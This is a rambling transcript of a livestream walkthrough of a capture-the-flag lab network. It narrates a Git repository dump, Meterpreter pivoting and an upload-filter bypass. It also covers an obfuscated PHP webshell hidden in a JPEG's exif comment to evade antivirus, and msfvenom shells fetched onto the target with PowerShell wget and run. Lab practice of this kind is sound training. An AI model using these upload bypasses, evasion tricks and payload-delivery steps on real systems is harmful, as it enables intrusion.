Alright, so we have successfully gotten the Git file here. So we downloaded it from our WinRM session that we had, right? Evil WinRM with a download, where's that? Right here. Download full name, full path to the full path we want to download to. Now from there, let me do an ls-la. From there, I did the site is still named website.git. I made a directory for that. And then I changed that whole C drive whenever it comes through like C, git stack repository, website.git, when it has all that crap on there. I changed that to just .git. So I think I did a move. Yep, it was called website.git in here also. And we changed that to .git. We then took our extractor.sh, put it in the same folder. So I have a folder to another subfolder. Put it in that same folder, and we ran extractor.sh from website.git, which we changed the second website.git that we had to .git. I hope that makes sense. So if I can actually go back to the program, you can actually see it all through what we did here. So we can see that there's no .git folder, right? You see website.git that had a subdirectory also called website.git. I decided to copy the extractor over. It still says no .git folder. We're in website.git. We moved the subdirectory website.git to just be .git. This is probably super confusing. And we still have our extractor.sh in here. And then we ran it, /extractor.sh, period, and then said website. We're just going to call it website. So that made a folder called website. And also it ran because that .git is in there. So if we cd into website, we have these three files in here. They are not by date. They're just randomly freaking named, which is kind of, there's our commit meta.txt. We should have the second one should say the same thing. Commit meta.txt, and then the third one should say the same thing. Commit meta.txt. Alright, cool. So now what we have to do is we have to look through those folders, right? So if I go up to the wonders of Git, okay, so we finally got it, right? Finally completed that task. We're on a 9-day streak. 9-day streak. It'll fail because since I'm out in Okinawa, I feel like the time difference for the 24 hours is weird. So I can literally, like, I could do one, right? Get a 9-day streak. Wake up, right? So 6 a.m. Go do it again. I'm back at a 0-day streak. It's super weird. So I think it's just time difference that I'm in like right now. So we have now completed that, right? So now we have all these commit meta.txt, right? It's up to us to piece together the order of the commits. Fortunately, there are only 3 commits in this repository. Each commit comes with a commit meta.txt file, which you can use to get an idea of the order. So let's go ahead and try to figure out the order of this thing, right? Let's go ahead and cat that one. This is 2, right? So 2 has Wreath, commander Wreath. That's not a date either. That's not a very good. (1604) is before 1609, so I'm going with that one's probably number 1. We already checked out 2. We checked out 0. I know I like to skip around. This one's 1608. So we have 1604. So it goes 0, 1, 2. From what I'm seeing, like right here, because that's 1. So it goes 0, 1, 2. All right, cool. So that's easy. But yeah, they could not be in order, so you know, we just can't each of these files out separately, but may as well do it a fancy way with a bash one-liner. Wow, what is that? I just cat each one out. I'm not that cool. I'm not as cool as what they did it. They are super fancy. But I'm definitely going to print screen that in case I ever have to do this again. There's like a freaking 100 of them on there. And I'm definitely going to copy that command. We did a cat on each one, which means we are peasants. There. Let's go ahead and copy that command. That's pretty cool, like right there. I like that. Then we'll go ahead and we'll just put that in there. Okay, cool. So, Here we can see the 3 comments updated the filter, initial comment, backend, stack, website, commit. Keep saying comments, commit. So, oh, here's parents. Okay. So it doesn't have anything to do with this actually. I don't think. Maybe. We got the tree, parent. Parent is 70. Parent is 82. Yeah, so we had it right. So we could also follow this guy right here, it looks like. 1604 to 1608 because his parent is this guy right here, right? But ours was, no, ours started with 0, right? Let me see here. Am I just all jacked up? One has a parent. You know what? Let's go ahead and put in that cool thing right there. Well, that didn't help out at all. I wonder if I'm supposed to get all the commit dot. Oh, okay, cool. So this guy is a parent of A2DF, who is A2DF. So 2 has a parent of 1, and 1 does have a parent of 0. So yeah, we'll go 0, 1, 2. I would think. We just lost the session for some reason, but that's okay. We still have people in our up, right? Maybe not. Now we got this. The whole box is going to die, and that's going to be it for us. This is what I'm seeing like right now. Where'd you go? Why did we just lose you? Why are we not SSH anymore? Why are we not shuttled anymore? Why is nothing happening anymore? What just happened? Wreath, did you just die? Most likely. I'm going to go with yes. No, it did not just die. Okay. Set the payload to Linux x64 interpreter bind or reverse interpreter reverse TCP. I should not have hit tab. I should have just typed it out. If I could take longer for it to. There we go. Set lhost to ton 0. Set lport to 53. Go ahead and run him. cd and attempt caret /shell.elf. There we go. Okay, so at least we're getting back into him now, right? That's all that really matters. Okay. With that shuttle up, we should actually be able to get into the other guys too. Let's see here. Should. I don't know, we might have to run it all route. Nope, okay, cool. But we do have to, no matter what, get into the other guy no matter what, because we do have to run. I believe that he was on port 111, right? So, because we do have to run auto route, how I did it, because we didn't go through Chisel, right, is we ran that auto route to, so let's go ahead and auto route to 100. So let's go ahead and set payload to Windows x64, interpreter bind TCP, set the R host to 10.200.73.150, set the L port 101 /shell1.exe, and let's go ahead and run that. That's not going to work because we forgot to open up the ports again on the firewall, didn't we? So let's go ahead and head back over to that firewall. So sessions, I don't even know what we're on. Okay, maybe it did work. Did we go to sessions 10? Nope, okay, there it goes. Session 9. Shell, right? ID. Okay, cool. And we want to go ahead and run that firewall command, right? Because we may have just lost all of our firewall stuff like right there. And we did not, okay? Let's go ahead and just run him again. And he just closed for no reason. Let's go ahead and run that again, and we'll run him again. And it keeps closing. It is port 111, right? So I thought it was. I was pretty sure that's what I had there. Might have to make another one. Show options, hold up. I don't think I did it like that. I think I did it like that. Why do you keep closing? Stop closing. Huh? Huh? I did not reset up that auto route though either, so that might be another reason why it keeps closing. Oh yes! Mauricio 11041. I'm in. I'm in, bro. Let's do it. Okay, so we got session 16 open. Let's go ahead and do a run auto route. Tech S410.200.73.100. Mauricio, you run a hard bargain, but I'm in. We will buy viewers. Little does Mauricio know, I actually want a lot of people watching because I suck at this. Alright, so the short version is the most up-to-date version of the Git repository. Yeah, that didn't make sense, don't worry. Okay, so we can check to see if the other commit specifies a directed parent. We can then repeat the process, blah, blah, blah. Okay, so 70 is first, it's saying. Oh, that would be the latest one. Yeah, 70 is first, that one's second, this one's third. So the latest one would be this guy right here, right? That's what I think. No, if he's a child of that one. That is how we broke it down though, right? We said it goes by 0, 1, 2. But I guess that this one would actually be first. Because he would be, because the parent, we could also do this by checking the timestamps attached to the commits in Unix form. That sounds way easier. However, it's possible to fake these. Feel free to use them, but be aware they may not always be accurate. These guys are right here, right? That's what he's talking about? Okay, if that makes sense, don't worry. The short version is the most up-to-date version of the site stored is 345 AC. 345, okay. Yeah, that would be most up-to-date because that's the time like right there, and he would be the newest one, 0. Got it, okay. Website code analysis. So that means we're looking at 0. That would be the most up-to-date one. Head into the up directory. The index.html file isn't promising. Realistically, we need some PHP, which we identified as the web server's backend language task 31. Yes, we did. Let's look for PHP files using find. Find period tech name. Okay, yeah, let's do it. So let's go ahead and head over in that file, right? CD into 0, whatever. And we'll go ahead and run that. Yes. That looks good. It said negative. We have no PHP files in here. Only one result. Really? So I found a total of 0 results. And this is HTML. This is not PHP. Probably because I went into the wrong one also. CD into 2. We want to be at 345. That one's still HTML. CD into resources. We have an index.php right there. Let's go ahead and do that. Maybe we do have an index.php. Alright, cool. Let's go ahead and CD back. Okay, cool. So we can find it. CD back again. Can we do it like that? Ooh, we find 2 of them. Ooh, we are fancy. I'm so fancy. CD into 2. And we'll go ahead and run that command, and we see that like right there. Boom. Okay. We have to put them in order with the newest. Now we have to put them in order with the newest being the first. The newest being the one we want to look at. Okay. From here we need to find some PHP stuff. From here we need to find PHP. Okay, so we got that resource.php, right? Let's go ahead and CD into there. CD into resources, index.php, cat index.php. See what we got here. Welcome, Thomas. Oh, it's nice as web page, isn't it? Finish the styling, it looks awful. That was not nice. Get Ruby more food. Greedy animals going through it too fast. Not nice. Upgrade the filter on this page. Can't rely on basic auth for everything. Phone Miss Walker about the neighborhood watch meetings. Miss Walker probably it's him. And you name in bold Iggy. And you name in bold IGGY? I don't get it, Jep. What you were singing. Oh, is that what it is? Is that what? I didn't even know that. That's all I know is that one part. I listen to more, like rock and heavy metal and stuff like that. More of a Skin Dread kind of guy, with Nobody Gets Out Alive, and then a bunch of weird noises. Korn's first 2 albums, yes, first 2. Tool, any Tool. A Perfect Circle, any Perfect Circle, yes, even the one where they just played a whole bunch of other war songs, even that one. I was growing up in born in '85, so 90s was like right when I actually learned what music actually was. 5, 6 years old, stuff like that. Nirvana, obviously, Pearl Jam, classic rock, Pink Floyd stuff. I just know I'm so fancy. That's all I know. Singing the song. You write down the lyrics. I don't even know it. All right. So we're this index.php, right? If asset post upload as upload files temp name targets uploads / base name boom boom. Is this okay? So we can upload JPEG. So this kind of tells us what we can upload, huh? This index.php. We're even upload something that upload / probably / uploads. I'm gonna go with. Let's go and try that. / uploads. Is that a place? No. Okay. Is there a place to upload stuff in here? This actually works. We just get a bunch of pound signs. No, okay. Some good choices. Thank you. Thank you very much. My daughter asked my wife and I what we listened to when we were kids, and because she liked the Justin Bieber song, but we think she was embarrassed about it. So my wife pulled out some what was it, like a Backstreet Boys, stuff like that. She's like, hey, this is what all the girls listened to when I was a kid, And then she looked at me. She's like, Ryan, what did you listen to? So I started playing Korn, Blind. My son, my 3-year-old, he started banging on a table. I thought he was about to start a freaking mosh pit. Alright, so we can see that we could do some type of file uploaded here with this JPEG here, right? Or PNG or a GIF, whatever you want to call it. I'm going to call it one thing and lose 1,000 people, 1,000 subscribers on YouTube. Watch. Just hit 1,000, I'm going to lose 1,000 because I called it a GIF, not a GIF or something like that. Alright, so we can upload a file. Just try to figure out where to upload file to. I guess we could always try the proxy change GoBuster. You know what works with proxy change is dir-b. I think we talked about that last time though. Let's go ahead and try to do a dir-b proxy change, proxy change dir-b. That 100. Okay, so I have tried this before. Hopefully it stays up and hopefully this thing doesn't get killed because of it. But let's keep reading because it looked like there was an upload place. So if we're going to find a series vulnerability, it's going to have to begin here. Read through the file. What does Thomas have to phone Miss Walker about? The neighborhood watch program. Good thing I looked at that. Good thing I can't spell neighborhood because I grew up in a city. Let me see here. Good thing I'm an idiot. Neighborhood watch meetings anyways, I wasn't even right. So I guess if we really wanted to fish this guy, we could always send him an email on neighborhood watch meetings. This appears to be file upload point. Yes, it does. So we might have an opportunity for a filter bypass here. It looks like we can upload .jpg files. Additionally, to do the list, and we don't know if it's client-side or server-side validation. We also don't know if we can just change out the metadata. We don't know yet. Or the hex data and everything. Additionally, to do this to-do list at the bottom of the page, not only gives us insight into Tom's upcoming schedule, but also gives us an idea about the protection around the page itself. Aside from the filter, what protection methods is likely to be in place to prevent people from accessing this page? Yeah. What protection methods? Okay, so we got this filter right here, right? That says like, hey, you have to have this in there, right? What else protects it? This is all upload though. Upgrade the filter on this page. Can't rely on basic authentication for anything. So basic auth. So obviously I feel like we're gonna try to brute force something, but can we just go like index.php and maybe find something? Because I feel like it's gonna return us right back to here. Yeah, okay. What if we should do a TAC-X for this guy over here and do a PHP? See if we can find something in PHP over there. Let's keep looking. Okay, here's our images. Upload ID file submit value equals upload. Okay. So now we just gotta find that upload site, right? Let's go ahead and keep reading. Class PHP. Second line statement. Check two conditions. If either condition fails, indicated by OR operator, then the script will redirect the failure message. The second condition is easy. It's size. Just check the size. Variable change boolean false. First condition may need to be broken down a little bit. The two function here. Okay. The export function is used to split a string at specified character. Here it is being used to split the name of the file we upload at each period. Okay. From this we can rightly assume that the file extension filter, as example, for upload image.jpg, this function will return the list image JPEG, as the filter only really needs the file extension. And then grabs the second item from the list, 1, second item will be 1, because it starts with 0, right? Remember that the list starts with 0, yep. So, I wonder if we can get by it with just like a something, yeah, that's what I'm about to say. Something.php. But only the JPEG, the second element of the list, gets passed into the filter. Yeah. So that's 100% we can bypass it with something.php. That's what I was just thinking. If it's only looking at the second filter there. So let's go ahead and find that over here. Because I didn't know exactly that's what it was doing. So we have files, boom, file name, okay. So it says, yeah, you can upload those type of files, right? Yep, there it is, like right there. File name is looking at 1. So it's going to take the file name, separate it after each period, and then look at it. But it's actually going to look at, so if we had freaking shell.jpg.php, it's only looking at the second one because it's a 1, starts with 0. So 0 would be shell, 1 would be JPEG, but 2 would be PHP. And it's not looking past that. It's not looking past that first thing. So we can do that, okay. Which extensions are accepted? Comments, no spaces or quotes, okay. Which extensions are accepted? JPEG, PNG, and GIF. So it could be JPG, JPEG, PNG, GIF, or GIF, whatever you want to say. Okay, there we go. Between lines 4 and 15, target equals uploads base name of 1. We see that the file gets moved to an uploads directory with its original name, assuming it passed the 2 filters. This is something we know how to find. Yeah, we know how to find it, but I can't find where to upload the actual file at. So, and I think we're going to have to log in at some point, right? So I wonder if we have like a /admin /login/login.php, something like that. So that's what we need to find now is how the heck do we get into there? But it is a replica of the other one, right? So I wonder if we can actually attack the other site to be able to do that, to be able to get in there. Or if we just have to curl everything, I don't know. Okay, so, oh, /resources, no shit, huh? Because we're in resources like right now. So that would make sense. So since we're in the directory resources, right? Resources, we obviously have to go to /resources. That makes sense. So if we do a /resources, we get this username and password. Let's go ahead and print screen that. Boom. Copy that. Actually, what we're going to actually do is we're actually going to look at this again. And we're going to break down these two like right here in my notes, just so I have it for later on, just so it's always good to know what the heck I'm doing, right? Okay. And we'll say get repo, then we'll say exploitation. We'll say that. With index.php, we can see that only certain file extensions are allowed. However, looking at the second row of coding, we can see that is used, which means that is used with explode. This means that the server is looking at something dot something, and that is it, such as shell.jpg. The one is the second portion of it, which would be .jpg, because it is using explode, so it is separating into two different names. Since it is only looking at the second name, file extension, we can add in more extensions afterwards, such as .jpg, .php, thus allowing us to make a .php reverse shell. Okay, cool. This guy's still working out here. I'm going to let him go to see if we actually get that resources, see if he actually comes back. That's good. That's /resources. And yeah, we'll go from there. Just see if we can find it that way also. So we did go to /resources, right? It says get rid of basic authentication. I wonder if it's just admin or something like that. That'd be sweet. What, like Thomas admin? Thomas password? Nothing. Okay. So we're going to have to probably brute force that guy somehow, right? Let's go ahead and cancel /resource, or we might be able to find his password in the Git repository somewhere, I'm wondering also. Let's keep reading. We can assume the username is probably either Thomas or Wreath, yep. Both of which we've already seen. We also already have one of Thomas's passwords stolen for the Git server using Mimikatz. We do, I forgot about that. So, I'll say I've been moving around like 12 different boxes. So we did have a Mimikatz on here. We do have Wreath and then the I greater than 3 Ruby? I suck. I suck so much. So that was Wreath. That's 3 Ruby. He loves 3 Ruby. That's what that is. That's 3 Ruby. Oh, Thomas. I love Ruby. Oh, there, I put 3 in there last time. I actually kind of want to refresh this just so I can show like the. Remember, we don't have Chisel up and running. We are going through the auto route still for this guy, right? So hopefully this works. Looks like it's going to. It just looks like it's taking a minute. Which this box has gone really, really slow for me, and then just whipped down by, and then gone slow as heck for me again. So I feel like we can log in with that password. So I can just have these reusing the same password. We're just having a problem getting 2 there. And let's go ahead and okay, so we're still on there. We're still on that guy. He's still connected. Everything's still working properly. /resources. Yeah, that looks good. That looks real good. Right there. That loaded up good. Okay. Bullshit print screen. Let's just say we have his credentials from Mimikatz earlier. We try those. We do have creds for Thomas that we obtained earlier in Mimikatz. So let's go ahead and try those. I think I did the 3 that time. Okay, cool. So we get there. Those work. Probably about to take a break here in a second also. Because what happens is I start getting excited and then I continue just to keep doing things. Okay, so we know that we can upload now a PHP reverse shell. We know that. So let's go ahead and, I guess, create a listener on... We could just do it like this, huh? We could just do a little SSH tech I, root ID RSA. Let's go ahead and create a listener on here. I actually want to look at firewall, attack command, attack list all, right? Isn't it list all? Okay, so we're still good with that. So I think we could use probably port 8080 or some of that. We could always do a attack. I forgot what the heck it is. I always forget it. Add port, attack zone equals public. Add port equals 1337. So we'll use that port like right there. Now we'll know if it's on there and everything. We'll be good with that. Even though it's not very realistic, but you know, let's do it like that, okay? There's a lot of crap going on like right now. So we should, because this guy should technically, if I should be able to ping 10, or actually from 100, I should be able to ping into the web server at least, into this guy over here, because he is sending information to him, right? Because we have the dev one and the actual one, same exact site pretty much. So we should be able to do that, right? So let's try that. Does this guy have netcat on him? Or is this the one that we had to actually load netcat on? We have mmap on there. Does he have netcat? Great. So we have to get netcat back on this guy, which means we need to find the netcat binary again and then go from there, right? Which I believe I do have. Otherwise, I did it that many times, but that's how I roll. There we go. So netcat, we do have that. So let's go ahead and do a Control Z, yes, session tag I, whoops, whatever we're tackle, I guess, session 9. And we're going to do pwd, where the hell am I? I'm temp caret. So let's go ahead and upload, let's see. We're going to try to upload that netcat binary, cd/temp caret. And we have netcat in there now, right? So we can do a period/netcat, tag lvmp 1337. And, okay, change mode 777. Okay, so he's listed like right now on port 1337, right? I know there's a lot of stuff going on, I understand that. We can actually kind of move these guys over like right now again. Okay, so let's go ahead and try to, we got the netcat listening. Let's locate PHP reverse, grab him, the PHP reverse shell, right? Let's go ahead and copy him to here. Alright, let's go ahead and move PHP reverse shell to shell.php, make our life easier, right? Nano shell.php. Remember, we do have to put in this guy's address now, right? So 10.200, I actually don't remember what that was. Let's check it, just to make sure. 10.200, 73.200, okay. So we do have to add in that down here now on port 1337. 10.200. This is horrible right here. Okay, counter too many errors, so wasn't able to find that resources for us. I'm sure if we made like a little thing for it, we should make like a little one to see if we can find stuff. So 10.200, 73.200, right? So let's do a 10.200, 73.200. That's going to be for port 1337. And we're going to move shell.php actually to shell.jpg.php, right? Because it's going to be looking for that file, right? So desktop, try hack me, Wreath, And we have this should be able to find it right there. Screw out files, how about that? There we go. Shell.jpeg.php. Alright. And I guess let's go ahead and try to upload him and see if he uploads. Remember, I do have my the way that I'm in here, remember, is we're not using chisel, we are using auto route, and we did make that that proxy within Foxy proxy, right? Just want to remind everyone about that. That's how we're doing this. Hopefully he's able to get that guy and actually upload him. Not a very large file, so we should be able to get him in there. I don't remember what the file size said that we could do though. I don't really look at that. Cat index.php. What was the file size I could do? Well, he's got a picture of a cat, right? So I mean, I don't see any amount of size in here. He's taking his sweet time uploading it, so hopefully we don't break something doing that. Still have shuttle still up and running, our route still up and running, we're still connected over in here and everything. Interpreter still up and running, as far as I can tell. Get UID. Yep, we're still root up there. Let's go ahead and do a session stack I, session 16, get UID. Uh-oh. This might be our product right here. He might have just got kicked out. That's why he's not able to get over the other one. Now what the real question is, yeah, it looks like we might have lost the interpreter session over here. None of the commands aren't working anymore. So let's go ahead and exit out of here. That's okay. We'll go ahead and we'll do a show options. Your chance for my last stack. I don't know who you are, dude. Oh. 111. Okay, let's go ahead and rerun that. Show 1.exe. We'll rerun that all around and everything like that. Run it. I don't know if we need to use chisel. I don't know if this auto route's going to mess it up. That's why I'm kind of doing this however I want. Like right here, run auto route, stack S, 10.273.100. That's why I'm just kind of doing what I want. Because we're getting to the site, that was actually really quick. We're definitely getting to the site, right? Message equals fail, invalid file type. Really now? I don't think it was. We did that. Okay, how cute a page allows, yeah, see, it's cat. We already know how to bypass, simply changing the extension to .jpeg.php should be enough. Should have been. But let's go ahead and try the JPEG one then. So we'll move shell.jpg.php to shell.jpeg.php. Okay. And let's go ahead and try that again. Hey, where is it? Where'd you go? Right here. Browse. It's not finding it though. JPEG image, see? Upload him. Message equals fail. So we're failing at that. We are not able to upload that. The second filter is slightly harder but doable. As the get image size function is checking for attributes only an image will have. We need to give it what it wants, an image. We do some hex data or whatever. Exit tool to check the exit data. Yeah, ours is definitely going to say that's a PHP file. Because it's not even showing up as being a JPEG, right? So let's create a proof of concept. See, ours exit data, exit tool is probably going to show that it's a PHP, and it 100% does. 100% shows that it's a PHP file. That's where our problem is, like right there. Did he actually change his hex data and everything? His is showing that his is a JPEG. So how did you do that? Okay. In other words, yeah. The files of .php file extensions will be executed by website's PHP file, meaning all we do is force the web shell into the file we're golden. The easiest place to stick the shell is in the exif data for the image, specifically in the comment field. So can we just take an actual image? Can we take an image of his cat and do it like that? Let's go ahead and locate .jpeg. And we're just going to make a small little copy of that guy over here. How's that guy even called? He's called Green Bone. I mean, small, not really. Small enough for a JPEG image, right? Okay, so we got our green bone, boom, right? We're going to rename that to green bone dot. So let's go ahead and move green bone to green bone dot JPEG dot PHP. Exit that again. File not found. Yeah, that is 100% correct. Okay, so it's still JPEG. Now we want to put in there. Oh crap! Hydrate 20. Oh my god! I'm sorry. Sorry, Sean. Right. There you go. I'm about to take a break also here in a minute. Just so you guys know, I'm about to take like a 5-minute break here. We've been going for a minute. Going for close to 1 hour and a half now. So, yeah, 43, so yeah, an hour and a half. Pretty close to that. So I'm going to take a break here in a minute. Test payload and then die. Okay. What I think we could do is we're most likely going to put in, we have the ability to execute arbitrary PHP code on the system. Yeah. So I'm thinking what we're going to do is, oh man, how can we put HTML is configured for that? You'll see a scripting and working directory. Just change all supported types at the bottom right to Windows to all files. So yeah, did that. But he's actually uploading an actual real JPEG image. We were not, huh? His is also like 208 kilobytes. That's a very small JPEG image. So I say we actually do a. So should we get like a smaller one? Video. Let's upload a video. There we go. What's that? That looks like a horrible image, doesn't it? Okay, I mean a little bit smaller, right? Still not that small, but it's smaller than the other one. So let's go ahead and actually do that safety we just did. So let's go ahead and move whatever the heck that is to image.jpeg.php. Let's do it like that. And then let's add in some data here. So let's add in a comment, right? So exif tool, comment equals, and I'm thinking we put that comment, I think we just do, let me see here. think we do something like this, right? That should be command question mark, right? Command equals question mark command equals or whatever, or and command equals. Should be something like that. Let's go ahead and keep reading about this because we did that, right? We could technically upload it like right now. I just want to keep reading about this and see what else we're supposed to do here. So antivirus is the third and final primary teaching point of the Wreath network. Okay, boom, boom, PHP payload obfuscation. That's where we're. So yeah, command equals get Wreath if asset equal pre-shell. Okay, so I feel like that's exactly what we're doing, like right here. Get command, right? Echo shell execute get command. It's gonna be one of these two, like right here. And echo pre-shell execute. So we're probably gonna do this like right here. Something like that. You can probably put that guy in there. And I'll just see if he actually put like a command in there. Here we check to see if the get from error called Wreath has been set off. Okay, if so, we can execute it by using shell execute. Yeah, we have to decide HTML free tags to give us a clean output. Okay, well, we use die to prevent the rest of the image from showing us the garbled text on the screen. Okay, this is slightly longer than the classic PHP one-liner of system get command, which was one that we were going to use. Was a system get command. For two reasons. If we're obfuscated, then it will become a one-liner anyway. Anything different is good when it comes to antivirus evasion. That is true, okay? We need to obfuscate this payload. Oh, well, thank you. There are a variety of measures we could take here, including but not limited to switching parts of the exploited routes that they are in unusual order. True, okay. I just want to see you actually. Oh, you deep stretch. Yo, okay, I'm just gonna go take a break here in a bit. I'm not really good at stretching. Oh, there we go. Jumpy X Buig. Jumpy? I'm just calling you Jumpy, bro. Thank you very much for following. Alright. Man, you guys are redeeming everything. I'm just gonna take a break one, and I'm gonna make everything else like 1,000. The variety measure we can take care of including but not limited to switch parts exploited, including all the strings that are not recognizable, and split up the distinctive parts of the code shell execute. Get, which that's what he's doing like right here. Because he's saying command equals the get, right? And then what should they get, right? And then say shell execute command. Okay. Manual obfuscation very much stake with simplicity. Let's just use one of the available online tools. I want to go ahead and actually want to take a print screen of this whole thing like right here. Because I like that. So now we have to exploitation. Okay. We can only utilize an actual JPEG image, or else it does notice. However, we can put something in the comments of a JPEG, thus allowing us to still use code or still have RCE. Right? First, we need to bypass AV. First, we need to bypass AV. Okay. So let's go ahead and see what this tool is. Open link and new. PHP obfuscator. Oh. We just copy this and then obfuscate it. Make it real obfuscated. Okay. I still have this thing up, don't I? It's probably what is going on. Okay. Click obfuscate source code button, and we're left with this mess PHP. I mean, kind of got the same thing. Oh, he did code strings. He did everything, huh? He did everything. He did code strings. Yeah. You know what? Let's do everything. If we're gonna obfuscate, let's obfuscate it, right? Oh man. Yeah. Look at that, huh? Let's go ahead and grab this site like right here. We then get this jumbled output down here. Here's the site. Nice little PHP upscaling right there. Okay. Go ahead and try that guy. As this gate passes into a bash command, we'll need to escape the $ signs to prevent them from being interpreted as bash values. This means our file payload is as follows. Because we need to escape all those, huh? Good point. So I want to go ahead and do that probably right there. Bam. Okay. So let's go ahead and escape all of those now, because that's what we need to do next, right? So we need to escape. We should go that way, right? It's the escape one, right? Nope, I'm an idiot. Okay. There. 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 Surprised no one got reset the box yet. Well, someone did say reset the box, but it was not like holo. I hit reset and there's still like 4 more votes that had to go. So sorry, I can only do so much. One guy did it. It was a while ago to reset the box. Thank you very much, Dalbor, Lipovac, for subscribing. Thanks a lot for following. Thank you very much. Otherwise, they Control-Shift-C. Okay, so let's go ahead and grab that code. And we now want to put him into our JPEG image, right? So, I think we got rid of all the $ signs. So now we got to send that into a comment, right? With an obfuscated payload, we can now finalize our exploit. Once again, make a copy of an innocent image, which we did. Ensuring you give it a name format. Shell username. Okay, I didn't do it like that. I just did image. Then use exif tool to embed the payload in the image. We'll just in case anyone else gets on. We'll go ahead and move image.jpg to overdrawn caret. We're just gonna do OGC. OGC1.jpg.php. Alright. So there's that, right? And now we want to use the exif tool comment. And we're gonna pretty much put that exact thing in there. Just changing out our shell name there, right? So let's go ahead and use exif tool comment, and there's no like equals or anything that behind, right? Oh, there is. Comment equals, and we'll go ahead. It looks like it's also a capital C, so that's probably gonna mess up. So let's do comment equals, and let's do our code obfuscation in there. Equals. Do I have to do like parentheses around it? Anything crazy like that? Yes, we do. So we're going to need parentheses all the way around it. There to there. And we're putting that into OGC1. Warning. Tag comment is not defined or has a bad language code. Hate to see it. Alright. Comment is not defined or has a bad language code. Nothing to do. Let's see. Let's see what that means. Exit tool. Yeah, it did not put the comment in there. Huh. Okay. I think I did tac. I think it was only supposed to be tac, huh? Okay, there we go. So let's go ahead and print screen this guy right here. We'll go ahead and throw him back into my notes. Right. And we'll go ahead and we'll copy and paste that also into there. Just so we have the exact, what exactly I typed in there. Okay, cool. Now if we look at that file again with exit tool, I should have a comment in there with all that stuff in there, and I do. Alright, awesome. So we have that comment in there. And it looks like that might actually work, but that comment also does not have... Oh, it did. Okay. Yep. Oh, yeah, because the $ signs would have been messed up whenever they went through, huh? For everyone's commented, huh? Okay. So it looks like we exited out of $signs, it looks like. And everything was good. Alright, cool. Now we gotta put that file obviously into there, right? So let's go ahead and upload that guy. Browse. All files. And we want ogc1.jpeg.php, right? We're going to upload him. File uploads successfully. So is it resources/uploads, I wonder? Resources uploads slash, or do I just do resources uploads? Because now we can say command, right? Pretty much. So resources uploads, yep. Now we can actually do command using Wreath get from matter. Yep, okay. So now we just need to do that. We are moving right along with this guy. I don't know if okay, upload slash ogc1.jpeg.php. What about that? Okay, good, good. Do I do the question mark Wreath equals? Wreath, whatever you want to call it, equals ID? Or how I'm not host name? It was in the C drive, wasn't it? Wreath PC, that's the host name. So we are getting somewhere. Alright, let me go ahead and actually print screen that guy. Bam. Bam. Crushing it. Alright, cool. So we got host name like right there is PC. What is the current username? Include the domain in this. Okay. So who am I? Put this right. Who am I? Thomas. Obviously, I probably could answer that without really trying that one, huh? Because we logged in as Thomas. Compiling netcat and reverse shell. So we already kind of did this, right? All right. Before we do all this, I'm going to take a quick 5-minute break. I will have my phone on me, so if you guys have any questions on what we did so far, ask away. But yeah, I'm going to take a 5-minute break, and I will be back. See, who was it? Werewolf's not here. Tell me to take a 5-minute break. All right. Approaching the problem. I think there are usually main ways to obtain reverse shell options. Windows are a lot fewer in number. I want to first try to not do that. I want to try something real quick. I don't want to compile anything. I want to see if we can get into PowerShell with this guy. Let's do a PowerShell. Let's do, who am I? See if we can do that first. I want to see if it comes back as like need something else. Actually, it may not. It may not work like that. Let's do PowerShell PWD. Can we do a PowerShell? Are we even running on PowerShell? How can we check for running on PowerShell? Let's see here. Let's try to do a wget, I guess. Can we actually ping 10.200.73.200? Can we actually ping that guy? Like real quick. We can, okay. So let's see if we are actually on PowerShell. Let's do a wget HTTP 10.200.73.200 on port 888. We'll do a shell.exe, and we'll make a shell.exe over here. Well, we already know that shell 1 exists, right? That's on him actually, as shell 1 exists. Well, no, it's also up here, isn't it? So we already know that shell 1 does exist, right? So let's go ahead and actually just create a web server first. So let's go ahead and do a stack LA. We have a shell.exe here. It's not going to work for this guy, but let's see if we can actually get it. Let's do a Python 3 tacm http.server on port 888. Let's hop back over in here and let's see if that actually works. It did get him. Boom! Alright. So, since we didn't actually do anything with it, right, we're going to now create a bind shell, I'm thinking. And we're going to try to get it past this guy. I don't know what kind of antivirus he's using. Or we could always try to do a PowerShell reverse shell, right? Let's go ahead and make a bind shell first. MSF Venom, attack P, we're going to make a bind shell, right? And that's going to be for 10.200.73.100, right? We'll call that bind.exe. Okay, and we'll make that L port, we'll have it be 4444, right? And that is open. Last I knew, at least it was open. Okay. I think if I scroll up far enough, I think I can actually see. Yep, 444 is open. So, and then we're going to try to run netcat over here on port 4444, and then actually execute that bind.exe. So that's what I'm thinking. Now, if Windows Defender's on, it's going to tell us hell no, right? It's just not going to execute. We won't see the hell no portion of it. It's just not going to execute, right? I don't know. Let's actually see what type of user Thomas is. Net user Thomas. Or it might be Wreath. We don't know. Okay, so he's just a regular user, right? So he can't add anyone in here. He can't do anything crazy like that, right? So let's try to do a... We have to upload this bind TCP over in here first. So let's go ahead and do Control-Z, yes, session stack I. Let's go ahead and go into sessions 9. Should be in temp caret. And this guy's in temp caret over here. Caret. Okay. Let's go ahead and do an upload of bind.exe. So he should be uploaded here now. And we'll go ahead and we'll do a PowerShell wget HTTP 10.200.73.200.8088 bind.exe. Attack out file is going to be bind.exe. And let's see if he gets it. Okay. Now let's do a dir. See if he actually got it. And he did. Bind.exe. We come back over here. We see that it was a 200. He did get that. Okay. So now, I don't know why the hell I just did interpret. Well, I can do an interpret, I think. Let's go ahead and set lhost to be 10.200. Wait, what? Show options. What am I using like right now? Yeah, bind. Set our host to be 10.200.73.100. Set the L port to be 4444. Go ahead and run that. And let's go ahead and try to execute this. Bind.exe. We'll see if we get anything back over here. I feel like Defender's told us, hell no, you can't do that. But what about a reverse shell? So we could use a PowerShell script to maybe get a reverse shell. Or we could just, we don't really even need to do that. We could always just create a reverse shell down here. I wonder if we can get a reverse shell. So MSF Venom, attack P. We'll do MSF Venom, attack P, Windows x64, shell, reverse TCP. L port's going to be 4444, right? L host is then going to be 10.200.73.200 because we're going to bring back this web server, right? It's going to be an executable file. And we're going to call this rev.exe. Okay, so let's go ahead and upload that over into here because that bind shell did not open up. So most likely there is some type of antivirus on there, right? We could also maybe do a reverse shell PowerShell script back to this guy like right here. We may also be able to do that. That's something else we could look into. And then try to work out from there. Back to the other Windows machine. So let's try now. I feel like I should just did a generic shell because I don't know if that netcat's gonna be able to pick them up like that. But we'll try it. Stop that. Session tag I again. Sessions 9. Upload rev.exe, right? And from here we will do a PowerShell wget that guy right there, but we're not actually going to do bind again. We can stop you. Okay. Wget. We're going to call you rev.exe, and you are going to be downloading rev.exe. See if we get something back here. $10, 273, 200, 888. Web server's still up and running for that. Seems like that bind shell might have messed them up a little bit, huh? Let's try to who am I 